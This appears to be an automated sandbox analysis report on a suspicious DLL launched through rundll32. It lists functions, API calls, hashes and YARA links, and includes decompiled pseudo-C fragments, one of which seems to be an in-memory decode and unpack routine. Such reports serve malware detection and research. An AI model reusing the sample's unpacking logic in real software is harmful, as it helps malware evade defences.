    • Opcode Fuzzy Hash: f5581dcdb7fd1787a0a1adc69bb76e881bf901422e0ff261f7d5f60c4c7668f6
    • Instruction Fuzzy Hash: 89818C71C05B6A9FDF19CF98D490BEEBBB4FB0A314F06845AD514ABA40E770D944CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52EC64, Relevance: 6.2, APIs: 4, Instructions: 168COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: AdjustPointer
    • String ID:
    • API String ID: 1740715915-0
    • Opcode ID: 463ba503fbb3b0819dcbe6e3f4c28e25c10fb48d53c2e950280cfab30cd6551c
    • Instruction ID: 26e74fac6d2ba16532016b230caa9d8b2aa9705fdeb7cc2bb171e2082c77197a
    • Opcode Fuzzy Hash: 463ba503fbb3b0819dcbe6e3f4c28e25c10fb48d53c2e950280cfab30cd6551c
    • Instruction Fuzzy Hash: 1751BF726046029FEB2D8F64D891BBA77B5FF81310F10492DE91197ED1E731E888CB90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D533065, Relevance: 6.1, APIs: 4, Instructions: 144COMMON
    Download Yara Rule
    APIs
    • DName::DName.LIBVCRUNTIME ref: 6D5330ED
      • Part of subcall function 6D530206: __aulldvrm.LIBCMT ref: 6D530237
    • DName::operator+.LIBCMT ref: 6D5330FA
    • DName::operator=.LIBVCRUNTIME ref: 6D53317A
    • DName::DName.LIBVCRUNTIME ref: 6D53319A
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: NameName::$Name::operator+Name::operator=__aulldvrm
    • String ID:
    • API String ID: 2448499823-0
    • Opcode ID: 241bb6100157547b4340d68b951d3264de6f32d66e02e24b278c6a8df7c9acbe
    • Instruction ID: 8f2ad706809acf011a399084095663370adedff8d9835a7f0ca3f68c03d70b1d
    • Opcode Fuzzy Hash: 241bb6100157547b4340d68b951d3264de6f32d66e02e24b278c6a8df7c9acbe
    • Instruction Fuzzy Hash: 32513E70944365DFEB0ECF98C880AAEBBB4FB47341F028596E5155BA50E7B09A41CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5015A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 87%
    			E6D5015A3(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6d5041b0;
				_t39 = E6D501A4B(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4);
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6d5041cc;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6d505137; // 0x6d505137
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6D501D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6d5041cc = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000);
					}
				}
				return _v16;
			}























    0x6d5015aa
    0x6d5015ba
    0x6d5015c1
    0x6d5015c4
    0x6d5015d9
    0x6d5015e0
    0x6d5015e5
    0x6d5015f6
    0x6d5015f9
    0x6d501601
    0x6d501604
    0x6d5016ae
    0x6d50160a
    0x6d50160a
    0x6d50160e
    0x6d501676
    0x6d501610
    0x6d501610
    0x6d501613
    0x6d501615
    0x6d50161d
    0x6d501620
    0x6d501623
    0x6d50162b
    0x6d501633
    0x6d501634
    0x6d501635
    0x6d50163c
    0x6d50163c
    0x6d501650
    0x6d501655
    0x6d50165e
    0x6d501665
    0x6d501668
    0x6d50166c
    0x6d501671
    0x00000000
    0x00000000
    0x6d501628
    0x6d501628
    0x6d501673
    0x6d501680
    0x6d501695
    0x6d501682
    0x6d50168b
    0x6d501690
    0x6d5016a6
    0x6d5016a6
    0x6d5016b5
    0x6d5016bb

    APIs
    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6D5015F9
    • memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6D5017EC), ref: 6D50168B
    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000), ref: 6D5016A6
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Virtual$AllocFreememcpy
    • String ID: Mar 26 2021
    • API String ID: 4010158826-2175073649
    • Opcode ID: 6841a88af6c7080ea38ebe24bc6bb506a889d254a2cfdb9359d2cb1a609a6e0f
    • Instruction ID: dee5039b5451ba280654101fa7319c3c88ae9f5f6a7798bcc8bf29fbae0ae639
    • Opcode Fuzzy Hash: 6841a88af6c7080ea38ebe24bc6bb506a889d254a2cfdb9359d2cb1a609a6e0f
    • Instruction Fuzzy Hash: 21315E71E0060AABDF05CF99CD80FEEB7B9BF49308F148169D915EBA40D771AA058F91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D545E97, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D546A98: _free.LIBCMT ref: 6D546AA6
      • Part of subcall function 6D547D21: WideCharToMultiByte.KERNEL32(?,00000000,6D54A405,00000000,00000001,6D54A1AC,6D551463,?,6D54A405,?,00000000,?,6D5511C1,0000FDE9,00000000,?), ref: 6D547DC3
    • GetLastError.KERNEL32 ref: 6D545EFF
    • __dosmaperr.LIBCMT ref: 6D545F06
    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6D545F45
    • __dosmaperr.LIBCMT ref: 6D545F4C
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
    • String ID:
    • API String ID: 167067550-0
    • Opcode ID: 240fbe5dbb2dcb07255acc46bf1b26b159b527e0c70bb8676c5822f0d12390cf
    • Instruction ID: 9eb6dafe7d9200fda7ed86e46f3837fcbaf97f0bd8a2a7210f85c49f2a23ce7f
    • Opcode Fuzzy Hash: 240fbe5dbb2dcb07255acc46bf1b26b159b527e0c70bb8676c5822f0d12390cf
    • Instruction Fuzzy Hash: CD21B8B160820ABF9B199FA5888097BB76CFF45368711C914F91897D50D731EC5187A3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D53327D, Relevance: 6.1, APIs: 4, Instructions: 85COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: NameName::
    • String ID:
    • API String ID: 1333004437-0
    • Opcode ID: 8b9d1b8d5eff98fbf91ae3781094df10960077b78d2d241304f1f26e54b28624
    • Instruction ID: 00a28af2d3f94d9731373130d1b5d8fe4acdc91d99ed917487ff96fa34ed6ece
    • Opcode Fuzzy Hash: 8b9d1b8d5eff98fbf91ae3781094df10960077b78d2d241304f1f26e54b28624
    • Instruction Fuzzy Hash: DD31BF70D08268DFEF0DCFE8C844A9DBBB4BF06344F02845EE541ABA80EBB49845CB01
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D548BE2, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fdf945a7d7c27e4a934a3cc50ffb85f1ad3259895fbfe2a211812f45e508dd09
    • Instruction ID: e104195a36241c2f6cf32de74cfb38b75895c99db78d9499ec9cb6f28871afe4
    • Opcode Fuzzy Hash: fdf945a7d7c27e4a934a3cc50ffb85f1ad3259895fbfe2a211812f45e508dd09
    • Instruction Fuzzy Hash: 86212E31946122EBDB1686288E80B5A3F78AF467A0F11C922FD56FFA90D730DC0085E3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5435B9, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,?,?,6D550F08,?,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?), ref: 6D5435BE
    • _free.LIBCMT ref: 6D54361B
    • _free.LIBCMT ref: 6D543651
    • SetLastError.KERNEL32(00000000,6D5740F0,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?,?,6D572358,0000002C,6D54A405), ref: 6D54365C
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: 6d30720fe181df6314c39c0f56063f37abea72c4e85c71cae7cfd25187940f0d
    • Instruction ID: 95d0528b326a27b6e433836493454785324b290c5f7c400f87f743fb48fea11a
    • Opcode Fuzzy Hash: 6d30720fe181df6314c39c0f56063f37abea72c4e85c71cae7cfd25187940f0d
    • Instruction Fuzzy Hash: 8C11C1711481139BFF1D16759C85B3A26696BC637AF238534F33886DE0DB218D044553
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D53648D, Relevance: 6.1, APIs: 4, Instructions: 62COMMON
    Download Yara Rule
    APIs
    • FreeLibrary.KERNEL32(00000000,?,?,?,6D53654E,?,?,6D588E14,00000000,?,6D536735,00000004,6D56ABEC,6D56ABE4,6D56ABEC,00000000), ref: 6D53651D
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: FreeLibrary
    • String ID:
    • API String ID: 3664257935-0
    • Opcode ID: 2ba2d2e58f428aa8c002e7847253d6e637a6a5eac4f61d8e8adfc34843c860f0
    • Instruction ID: 426b599f5b4ce936f257fa4e4158f1f96369b24e0305c01b445ed3bb43ebeb40
    • Opcode Fuzzy Hash: 2ba2d2e58f428aa8c002e7847253d6e637a6a5eac4f61d8e8adfc34843c860f0
    • Instruction Fuzzy Hash: 0D11C632A44332ABDF168B688C44B5D77B4AF02771F534A35F910E7A84F770E90086E1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D501D32, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
    Download Yara Rule
    C-Code - Quality: 86%
    			E6D501D32(void* __ecx, intOrPtr _a4) {
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				if(SetThreadAffinityMask(_t13, 1) != 0) {
					SetThreadPriority(_t13, 0xffffffff);
				}
				_t4 = E6D5017A7(_a4);
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}






    0x6d501d3b
    0x6d501d4e
    0x6d501d53
    0x6d501d53
    0x6d501d59
    0x6d501d5e
    0x6d501d62
    0x6d501d66
    0x6d501d66
    0x6d501d70
    0x6d501d79

    APIs
    • GetCurrentThread.KERNEL32 ref: 6D501D35
    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6D501D40
    • SetThreadPriority.KERNEL32(00000000,000000FF), ref: 6D501D53
    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6D501D66
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Thread$Priority$AffinityCurrentMask
    • String ID:
    • API String ID: 1452675757-0
    • Opcode ID: 7f1b3bbeb45c378bd781859f0c7e171b8924e2eba9f3509cb3d269e3d2c6fb35
    • Instruction ID: 912eb630870607a73d1147d285cbae17bbc4e0e8740de2f94741d91cbde4f8bf
    • Opcode Fuzzy Hash: 7f1b3bbeb45c378bd781859f0c7e171b8924e2eba9f3509cb3d269e3d2c6fb35
    • Instruction Fuzzy Hash: FFE092313063116BEB062A294C88F6F7BACDFD33367024339F624D25D0DB548C0586A6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D55846A, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
    Download Yara Rule
    APIs
    • WriteConsoleW.KERNEL32(?,?,6D54A405,00000000,?,?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,?,00000001), ref: 6D558481
    • GetLastError.KERNEL32(?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,?,00000001,00000000,00000001,?,6D5513FC,6D54A1AC), ref: 6D55848D
      • Part of subcall function 6D558453: CloseHandle.KERNEL32(6D574940,6D55849D,?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,?,00000001,00000000,00000001), ref: 6D558463
    • ___initconout.LIBCMT ref: 6D55849D
      • Part of subcall function 6D558415: CreateFileW.KERNEL32(6D56FFF8,40000000,00000003,00000000,00000003,00000000,00000000,6D558444,6D557078,00000001,?,6D550E97,00000000,?,00000001,00000000), ref: 6D558428
    • WriteConsoleW.KERNEL32(?,?,6D54A405,00000000,?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,?,00000001,00000000), ref: 6D5584B2
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
    • String ID:
    • API String ID: 2744216297-0
    • Opcode ID: 47d0a9b1d967b31671ef8cfd5b980b2fe918855e3189ebba835ade13e93b45d2
    • Instruction ID: ca9a28d62a191b37c697dec5e38eecc61ba756f227df26cb1d4887d56c0ac264
    • Opcode Fuzzy Hash: 47d0a9b1d967b31671ef8cfd5b980b2fe918855e3189ebba835ade13e93b45d2
    • Instruction Fuzzy Hash: C5F01536112129FBCF535F95DC08A8E3F76FB4E3A6B064511FE0886920C7328820AB92
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5445B7, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free
    • String ID: -
    • API String ID: 269201875-2547889144
    • Opcode ID: 9091675e5ee01277a4355e9d51ff1a1ef51bdaa6ba45514266698a87500fddac
    • Instruction ID: 7f1ef56be1a11e8570ec3341c267fb7e764bbac703bf913c6f9f9b1deff4cab3
    • Opcode Fuzzy Hash: 9091675e5ee01277a4355e9d51ff1a1ef51bdaa6ba45514266698a87500fddac
    • Instruction Fuzzy Hash: FAC106319442569BDB2CDF64CC40BFA73B9FF49314F11C8AAD915A7980EBB19E80CB52
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D541E80, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: __aulldvrm
    • String ID: +$-
    • API String ID: 1302938615-2137968064
    • Opcode ID: 1134f9e8c27b04b340c1708a31674581c04f4e75eaac8e8cd9332b924b49ba7e
    • Instruction ID: 5ebc70a673eb80c28e15da06f1dee0750bf19152bc34c7005694386a1b1c4f66
    • Opcode Fuzzy Hash: 1134f9e8c27b04b340c1708a31674581c04f4e75eaac8e8cd9332b924b49ba7e
    • Instruction Fuzzy Hash: D991073090425AAEDF1DCE69C450AFEBBB1EF42364F10CA46E875DBA91D3309552CB63
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5374E6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID:
    • String ID: C:\Windows\SysWOW64\rundll32.exe
    • API String ID: 0-2837366778
    • Opcode ID: 4717bc2923aaca1849f4a162cead2d34d0912a9234bb61f3b02e0b12c9541ef6
    • Instruction ID: 6a72655316f092c6fee162ecfc7533d483d24761977493ec83f12830eb8a5dd0
    • Opcode Fuzzy Hash: 4717bc2923aaca1849f4a162cead2d34d0912a9234bb61f3b02e0b12c9541ef6
    • Instruction Fuzzy Hash: DD41A571E04365EBDF1ACB99CC80A9EBBF8EF86310F124466E515D7A40FB709A01CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52E680, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON
    Download Yara Rule
    APIs
    • ___except_validate_context_record.LIBVCRUNTIME ref: 6D52E6BF
    • __IsNonwritableInCurrentImage.LIBCMT ref: 6D52E773
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 3480331319-1018135373
    • Opcode ID: 3088ee9b3da4a6c3d8d0ae3b13eb3d029ff6ef6619e1dd698ebac3cdb1c62e73
    • Instruction ID: f94f3fed9b4fdd98a0b42d5a7c117e4e1fabbabe57137155f48bfc45716e9551
    • Opcode Fuzzy Hash: 3088ee9b3da4a6c3d8d0ae3b13eb3d029ff6ef6619e1dd698ebac3cdb1c62e73
    • Instruction Fuzzy Hash: B041F634A042499FCF08CF78C880AAE7BB5BF45318F188555E924DBBD1DB31E909CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D547292, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D54703B: GetOEMCP.KERNEL32(00000000,6D5472AD,6D550B1E,00000000,?,?,00000000,?,6D550B1E), ref: 6D547066
    • _free.LIBCMT ref: 6D54730A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free
    • String ID: H H
    • API String ID: 269201875-1816914026
    • Opcode ID: 184f393038e83f109f421203f593f43dd373a888e6112b06e49cddf4ea5da308
    • Instruction ID: 98822297e7caeaec5452d18ec0c3004cf1f69f58deea6511b265fc422c545157
    • Opcode Fuzzy Hash: 184f393038e83f109f421203f593f43dd373a888e6112b06e49cddf4ea5da308
    • Instruction Fuzzy Hash: 9431A37190824AAFDF09CF98C840BDE7BF4EF45358F228469EA1097690EB31DD51CB92
    Uniqueness

    Uniqueness Score: -1.00%

    Analysis Process: rundll32.exe PID: 6664 Parent PID: 6640 rundll32.exeCOMMON

    Executed Functions

    Function 6D52A958, Relevance: 7.6, APIs: 5, Instructions: 87COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: dllmain_raw$dllmain_crt_dispatch
    • String ID:
    • API String ID: 3136044242-0
    • Opcode ID: b3654e4926da37d0847fd49d11c7922a5328385dbf5a26a18d57d14d9c1dda13
    • Instruction ID: 320ebb8cc9b7f9ae688d4b65ec6c1f1d1e2a28de22e9a359cfa2196ae796c12e
    • Opcode Fuzzy Hash: b3654e4926da37d0847fd49d11c7922a5328385dbf5a26a18d57d14d9c1dda13
    • Instruction Fuzzy Hash: 44219172D0461AAFCB298E25CD40E7F3A79EFC4BA4F024515F82557A90C7308D498FE0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52A7A1, Relevance: 4.6, APIs: 3, Instructions: 76COMMON
    Download Yara Rule
    APIs
    • __RTC_Initialize.LIBCMT ref: 6D52A7EE
      • Part of subcall function 6D52B40D: RtlInitializeSListHead.NTDLL(6D588DD0), ref: 6D52B412
    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D52A858
    • ___scrt_fastfail.LIBCMT ref: 6D52A8A2
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
    • String ID:
    • API String ID: 2097537958-0
    • Opcode ID: dc8fd1917554c780ca088498fe6b52c48a349d5dc6d6fe407874b01c88e725ca
    • Instruction ID: 9c8ae21e878c3c0282fbb5e741d260dd475e9d98cd92f08348496be605965202
    • Opcode Fuzzy Hash: dc8fd1917554c780ca088498fe6b52c48a349d5dc6d6fe407874b01c88e725ca
    • Instruction Fuzzy Hash: 2721273254C2129EDF1D7BB49804FAC3B729F8226DF124816D680B7DC2DB32484EC6A6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D545D30, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
    Download Yara Rule
    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6D545D71
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 665d7b99aae0023b07a8382b130f00d4dc4c2877de3ca0bd8439ec3edc3baabd
    • Instruction ID: e9374abefb1ccb153a20242b3a8ebceb6198635ec6c7f30bf1487769857007c1
    • Opcode Fuzzy Hash: 665d7b99aae0023b07a8382b130f00d4dc4c2877de3ca0bd8439ec3edc3baabd
    • Instruction Fuzzy Hash: 1BF0E93164457567EF1E5A76CC0CB7B3798AF82770B12C922E814DBC94DB20EA0586E3
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    Function 6D54F1CF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
    Download Yara Rule
    APIs
    • GetLocaleInfoW.KERNEL32(?,2000000B,6D54F4ED,00000002,00000000,?,?,?,6D54F4ED,?,00000000), ref: 6D54F268
    • GetLocaleInfoW.KERNEL32(?,20001004,6D54F4ED,00000002,00000000,?,?,?,6D54F4ED,?,00000000), ref: 6D54F291
    • GetACP.KERNEL32(?,?,6D54F4ED,?,00000000), ref: 6D54F2A6
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: InfoLocale
    • String ID: ACP$OCP
    • API String ID: 2299586839-711371036
    • Opcode ID: 1b23e779680c22bce25c562be7c8f9160bbcb67ef42a9147fe2f01f709d2d44f
    • Instruction ID: ac97e00777d40908981faea32fca04b60d1a0b2c34faa57eaf7e2482a40eb842
    • Opcode Fuzzy Hash: 1b23e779680c22bce25c562be7c8f9160bbcb67ef42a9147fe2f01f709d2d44f
    • Instruction Fuzzy Hash: E521A43AA4C102A6E75DCF5CCE01A9B73B6BB85B54B52CD24E905C7900E732DD40C762
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54EA25, Relevance: 7.8, APIs: 5, Instructions: 251COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,?,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,6D5740F0,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?,?,6D572358,0000002C,6D54A405), ref: 6D54365C
    • GetACP.KERNEL32(?,?,?,?,?,?,6D544733,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6D54EAE6
    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D544733,?,?,?,00000055,?,-00000050,?,?), ref: 6D54EB11
    • _wcschr.LIBVCRUNTIME ref: 6D54EBA5
    • _wcschr.LIBVCRUNTIME ref: 6D54EBB3
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6D54EC74
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
    • String ID:
    • API String ID: 4147378913-0
    • Opcode ID: d4dce55865838ccdc4576b08ddc6ec48ec902a7c57d6bee3f15b6c7afcd9e0fd
    • Instruction ID: d78fea38672865cb5b77d662cfdd72af5e1de1b1ab1a210d5fb313ed846aef42
    • Opcode Fuzzy Hash: d4dce55865838ccdc4576b08ddc6ec48ec902a7c57d6bee3f15b6c7afcd9e0fd
    • Instruction Fuzzy Hash: BB713B71644203AAE71EDB75CD49FB773A8FF85304F11C86AEA05D7980EB70E94187A2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54F3A4, Relevance: 7.7, APIs: 5, Instructions: 183COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,?,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,6D5740F0,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?,?,6D572358,0000002C,6D54A405), ref: 6D54365C
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D54361B
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D543651
    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6D54F4B0
    • IsValidCodePage.KERNEL32(00000000), ref: 6D54F4F9
    • IsValidLocale.KERNEL32(?,00000001), ref: 6D54F508
    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6D54F550
    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6D54F56F
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
    • String ID:
    • API String ID: 949163717-0
    • Opcode ID: 0342d1bd0088ea01e71d3b5c6ade30597ffe17d61c3e8a48bdfcfd21e39eb471
    • Instruction ID: 10b3acbe3ac6cbad06cc1ab24985ce8530a03155b276faebcad073cae3c52fba
    • Opcode Fuzzy Hash: 0342d1bd0088ea01e71d3b5c6ade30597ffe17d61c3e8a48bdfcfd21e39eb471
    • Instruction Fuzzy Hash: 7A515671A00206AFEF09DFA8CC44BBF77B8FF45704F158869E614E7590EB7099448B62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D502485, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195nativeCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6D502485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
